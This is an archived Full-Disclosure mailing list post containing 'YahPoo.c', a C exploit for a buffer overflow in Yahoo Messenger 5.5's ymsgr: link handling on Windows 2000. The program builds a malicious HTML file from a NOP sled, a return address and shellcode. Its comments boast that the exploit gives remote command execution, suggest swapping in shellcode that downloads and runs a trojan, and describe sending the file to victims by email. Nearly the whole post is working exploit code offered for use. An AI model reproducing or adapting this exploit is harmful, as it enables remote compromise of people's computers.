lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001601c34861$102ce0b0$0201a8c0@dsr2>
From: bob at dtors.net (bob)
Subject: Yahoo Messenger 5.5 exploit for win2k

/* Yahpoo.c by bob@...rs.net  [www.dtors.net] [DSR]
 *
 * Why Yahoo Messenger have not fixed this vulnerbility
 * I dont know...but either way they are stupid!
 * 
 * This exploit has been tested on:
 * Yahoo Messenger 5,5,0,1246
 * Yahoo Module 5,5,0,454
 * 
 * For:
 * Windows 2000 Professional 5.0.2195 SP3
 *
 * Rave@...rs.net has released a windows [exe] version of this
 * exploit but for Windows XP Pro SP1. 
 * So both targets are vulnerable XP/2k...some addresses might need changing.
 *
 * Problems that may occur:
 * 
 * The addresses used may vary from box to box..so they might need changing.
 * The stack may keep on changing the location of your shellcode address..you
 * need to hit a static sector that will not alternate. [this is the reason we jmp]
 * There exist two crashes...the first one we bypass..this is the access violation
 * when you hit the nop sled the first time round. The second crash is where we 
 * hit the nop sled...so dont get confused between the 2.
 *
 * The shellcode used here...will not do anything malicious..just opens a popup box
 * You can change this shellcode to something else...but the buffer is not very big
 * so there is no chance of a bind shell or anything.
 * Sloth from nopninjas.com has a shellcode that will download a trojan
 * and execute it. Nice and small as well ;)
 *
 * Thats about it...this exploit will lead to remote command execution on the
 * victim. Bare in mind this is triggered via bad URI handling...and the victim
 * needs to actually view the evil html file..this can be done automatically via
 * email >:)
 *
 * Big Lovin to rica.
 * Thanks to rave for his time.
 * Greetz:
 * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin,
 * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f.
 * special thanks to sloth@...ninjas
 *
 * 
 * bob@...rs.net www.dtors.net
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h> 
#define MessageBoxA "\x1d\x97\x53\x01"


char ret[8]= "\xD5\x96\x7A\x01";


unsigned char win32_msgbox[] = {
    "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA  "\x2D\x01\x01"
    "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
    "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
}; 

int main(int argc,char *argv[])
{
 FILE *evil;
 char *shellcode = win32_msgbox;
 unsigned char buffer[5000];
 int offset=320;

                fprintf(stdout, "\n\tYahPoo.c By bob.\n");
         fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
         fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");

                fprintf(stdout,"Makin' da EbUL HTML File... ");
  if ((evil =fopen("yahoo.html","w"))==NULL){
   fprintf(stderr,"Failed\n");
   exit(1);
   } else {
   fprintf(stderr,"Opened!\n");
   }

 

 memset(buffer,0x00,offset+32+strlen(shellcode));
  memset(buffer,0x90,offset);


 memcpy(buffer+offset,ret,4);
 memcpy(buffer+offset+4,shellcode,strlen(shellcode));

        buffer[264] = 0xD4;   //address of &shellcode
        buffer[265] = 0x96;
        buffer[266] = 0x7A;
        buffer[267] = 0x01;
        
        buffer[272] = 0xF5;   //jmp 0xc [msvcrt.dll]
 buffer[273] = 0x01;
 buffer[274] = 0x01;
 buffer[275] = 0x78;

 fprintf(evil,"<html>");
 fprintf(evil,"<title>Bought to you by dtors.net!</title>\n");
 fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n");
 fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n");
 fprintf(evil,"<pre>");
 fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22);
 fclose(evil); // <-- closing yahoo.html
 
 fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");

  } 

 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030712/2cc5abc1/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: YahPoo.c
Type: application/octet-stream
Size: 3705 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030712/2cc5abc1/YahPoo.obj

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ